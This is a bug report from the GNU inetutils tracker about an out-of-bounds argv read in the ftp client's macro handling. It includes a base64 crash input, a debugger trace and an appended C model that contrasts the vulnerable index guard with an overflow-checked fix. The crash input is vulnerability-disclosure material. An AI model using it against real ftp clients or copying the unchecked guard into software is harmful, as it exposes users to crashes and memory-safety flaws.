URL: <https://savannah.gnu.org/bugs/?61722>
Summary: Untrusted Pointer Dereference in domacro() at inetutils/ftp/domacro.c:186
Project: GNU Networking Utilities
Submitted by: aidai
Submitted on: Thu 23 Dec 2021 01:54:14 PM UTC
Category: None
Severity: 3 - Normal
Item Group: None
Status: None
Privacy: Public
Assigned to: None
Open/Closed: Open
Discussion Lock: Any

_______________________________________________________

Details:

# Untrusted Pointer Dereference in domacro() at inetutils/ftp/domacro.c:186

## Description

An Untrusted Pointer Dereference was discovered in domacro() at inetutils/ftp/domacro.c:186. The vulnerability causes a segmentation fault and application crash.

**version**

```
./ftp --version
ftp (GNU inetutils) 2.2.16-cf091
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.
```

**System information**

Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

**poc**

```
base64 poc
bWEgIAoCCiQkJCQkMiQkJDAkJCQkNTUxNTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1
NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1
NTU1NTU1NTU1NTU1NSQkCQICCgoCAAQJZAD/CgQX6ygKCgocCiQKCQIKCgoAAP////8K//8CCiQK
CP8g/3cCCgIACv8=
```

**command:**

```
./ftp < ./poc
```

**Result**

```
./ftp < ./poc
(macro name) Enter macro line by line, terminating it with a null line
?Invalid command
?Invalid command
?Invalid command
(macro name) [1]    2677333 segmentation fault  ./ftp < ./poc
```

**gdb**

```
domacro (argc=2, argv=0x55555557e680 <margv>) at domacro.c:186
186                                strlen (argv[j + 1]) + 2))
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
 RAX  0x555471c9ada0
 RBX  0x555555583646 ◂— 0x24242402
 RCX  0x21000
 RDX  0xffffffff1c71c720
 RDI  0x7ffff7f59b80 (main_arena) ◂— 0x0
 RSI  0x411
 R8   0x555555583640 ◂— 0x2402242424242424
 R9   0xd
 R10  0x55555557100d ◂— 0x504f4f4e002029 /* ') ' */
 R11  0x9
 R12  0x555555559f30 (_start) ◂— endbr64
 R13  0x7fffffffe220 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffe070 —▸ 0x7fffffffe0b0 —▸ 0x7fffffffe130 ◂— 0x0
 RSP  0x7fffffffe000 —▸ 0x55555557e680 (margv) —▸ 0x555555572c76 ◂— 0x6c75616665640024 /* '$' */
 RIP  0x55555556045a (domacro+815) ◂— mov rax, qword ptr [rax]
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
 ► 0x55555556045a <domacro+815>    mov    rax, qword ptr [rax]
   0x55555556045d <domacro+818>    mov    rdi, rax
   0x555555560460 <domacro+821>    call   strlen@plt <strlen@plt>
   0x555555560465 <domacro+826>    lea    rdx, [rax + 2]
   0x555555560469 <domacro+830>    lea    rax, [rbp - 0x40]
   0x55555556046d <domacro+834>    mov    rcx, rdx
   0x555555560470 <domacro+837>    lea    rdx, [rip + 0x1e2c1] <0x55555557e738>
   0x555555560477 <domacro+844>    mov    rsi, rax
   0x55555556047a <domacro+847>    lea    rdi, [rip + 0x1f6c7] <0x55555557fb48>
   0x555555560481 <domacro+854>    call   lengthen <lengthen>
   0x555555560486 <domacro+859>    test   eax, eax
──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /root/disk2/fuzzing/inetutils/inetutils/ftp/domacro.c
   181                   j = 10 * j + *cp1 - '0';
   182                   cp1--;
   183                   if (argc - 2 >= j)
   184                     {
   185                       if (lengthen (&line, &cp2, &linelen,
 ► 186                                     strlen (argv[j + 1]) + 2))
   187                         {
   188                           allocflg = 1;
   189                           goto end_exec;
   190                         }
   191                       strcpy (cp2, argv[j + 1]);
──────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe000 —▸ 0x55555557e680 (margv) —▸ 0x555555572c76 ◂— 0x6c75616665640024 /* '$' */
01:0008│     0x7fffffffe008 ◂— 0x25556a93e
02:0010│     0x7fffffffe010 —▸ 0x7ffff7d3b740 ◂— 0x7ffff7d3b740
03:0018│     0x7fffffffe018 ◂— 0x55583620 /* ' 6XU' */
04:0020│     0x7fffffffe020 ◂— 0x2e38e38e3
05:0028│     0x7fffffffe028 ◂— 0x0
06:0030│     0x7fffffffe030 —▸ 0x55555558364a ◂— 0x0
07:0038│     0x7fffffffe038 —▸ 0x55555557eb37 (macbuf+119) ◂— 0xa00020209242435
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
 ► f 0   0x55555556045a domacro+815
   f 1   0x555555566a09 cmdscanner+633
   f 2   0x55555556665a main+929
   f 3   0x7ffff7d950b3 __libc_start_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  domacro (argc=2, argv=0x55555557e680 <margv>) at domacro.c:186
#1  0x0000555555566a09 in cmdscanner (top=1) at main.c:461
#2  0x000055555556665a in main (argc=0, argv=0x7fffffffe230) at main.c:310
#3  0x00007ffff7d950b3 in __libc_start_main (main=0x5555555662b9 <main>, argc=1, argv=0x7fffffffe228, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe218) at ../csu/libc-start.c:308
#4  0x0000555555559f5e in _start ()
```

_______________________________________________________

Reply to this item at:

  <https://savannah.gnu.org/bugs/?61722>

_______________________________________________
Message sent via Savannah
  https://savannah.gnu.org/
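Added example, not part of the report above and not inetutils code. The SOURCE pane of the gdb output shows how a `$<digits>` reference inside a macro line is resolved: `j` is accumulated with `j = 10 * j + *cp1 - '0'` and the only guard before `argv[j + 1]` is dereferenced is `argc - 2 >= j`. That guard has no lower bound, so a digit run long enough to wrap a 32-bit `int` negative still passes it and `argv[j + 1]` is read far outside `margv`. The crash frame shows `argc=2`, RAX sitting well below the `margv` base, and a sign-extended negative value in RDX, which is consistent with that reading; the reading is an inference from the visible data, not something the report states. The C below models the unchecked loop, a bounds- and overflow-checked replacement, and a substitution routine built on the checked parser. Only the `$<digits>` form is modelled; the struct and function names, the sample `argv`, and the digit strings are constructed for the example.

```c
#include <ctype.h>
#include <limits.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Outcome of resolving one "$<digits>" macro argument reference (constructed type). */
struct argref {
    int    index;    /* j as the parser computed it; -1 when the checked parser rejects */
    bool   accepted; /* whether the guard would allow argv[j + 1] to be dereferenced */
    size_t consumed; /* number of digit characters consumed after the '$' */
};

/* Model of the loop in the report's SOURCE pane: accumulate digits into j, then
 * guard only with "argc - 2 >= j".  domacro.c uses a signed int; the example
 * accumulates in unsigned and converts afterwards so the model itself has no
 * signed-overflow UB (the conversion wraps on two's-complement targets, which is
 * the behaviour the crash frame is consistent with). */
struct argref parse_argref_unchecked(const char *digits, int argc)
{
    struct argref r = {0, false, 0};
    unsigned acc = 0;
    while (isdigit((unsigned char)digits[r.consumed])) {
        acc = 10u * acc + (unsigned)(digits[r.consumed] - '0');
        r.consumed++;
    }
    r.index = (int)acc;                 /* wraps negative for a long digit run */
    r.accepted = (argc - 2 >= r.index); /* upper bound only: any negative j passes */
    return r;
}

/* Hardened variant: refuse the reference if 10*j + d would overflow, and require
 * 0 <= j <= argc - 2 explicitly ($0 .. $(argc-2) name argv[1] .. argv[argc-1]). */
struct argref parse_argref_checked(const char *digits, int argc)
{
    struct argref r = {0, false, 0};
    int max_index = argc - 2;
    bool overflow = false;
    while (isdigit((unsigned char)digits[r.consumed])) {
        int d = digits[r.consumed] - '0';
        if (!overflow) {
            if (r.index > (INT_MAX - d) / 10)
                overflow = true;        /* 10 * j + d would exceed INT_MAX */
            else
                r.index = 10 * r.index + d;
        }
        r.consumed++;                   /* still eat the digits so the caller skips them */
    }
    r.accepted = !overflow && max_index >= 0 && r.index >= 0 && r.index <= max_index;
    if (!r.accepted)
        r.index = -1;
    return r;
}

/* Expand "$<n>" references in one macro line using the checked parser.  A rejected
 * reference expands to nothing, mirroring the guard in the snippet (the copy is
 * simply skipped).  Returns the expanded length, or -1 if out is too small. */
int expand_macro_line(const char *line, int argc, char **argv, char *out, size_t outsz)
{
    size_t o = 0;
    const char *p = line;
    while (*p) {
        if (*p == '$' && isdigit((unsigned char)p[1])) {
            struct argref r = parse_argref_checked(p + 1, argc);
            p += 1 + r.consumed;
            if (!r.accepted)
                continue;
            const char *arg = argv[r.index + 1];  /* in range: 1 <= index + 1 <= argc - 1 */
            size_t n = strlen(arg);
            if (o + n >= outsz)
                return -1;
            memcpy(out + o, arg, n);
            o += n;
            continue;
        }
        if (o + 1 >= outsz)
            return -1;
        out[o++] = *p++;
    }
    out[o] = '\0';
    return (int)o;
}

int main(void)
{
    /* Constructed sample: macro invoked as "m foo", so argc == 2 as in the crash frame. */
    char *argv[] = {"m", "foo", NULL};
    int argc = 2;
    const char *hostile = "3000000000";  /* ten digits: wraps a 32-bit int negative */
    struct argref u = parse_argref_unchecked(hostile, argc);
    struct argref c = parse_argref_checked(hostile, argc);
    printf("unchecked: j=%d accepted=%d -> would read argv[%d]\n", u.index, u.accepted, u.index + 1);
    printf("checked:   j=%d accepted=%d\n", c.index, c.accepted);
    char out[64];
    expand_macro_line("get $0 $0.bak $1 $3000000000 end", argc, argv, out, sizeof out);
    printf("expanded: \"%s\"\n", out);
    return 0;
}
```

The checked parser keeps consuming digits after it has decided to reject, so the caller still skips the whole `$3000000000` token instead of copying its tail into the expanded line; the reject path then yields an empty expansion rather than an out-of-bounds `argv` read.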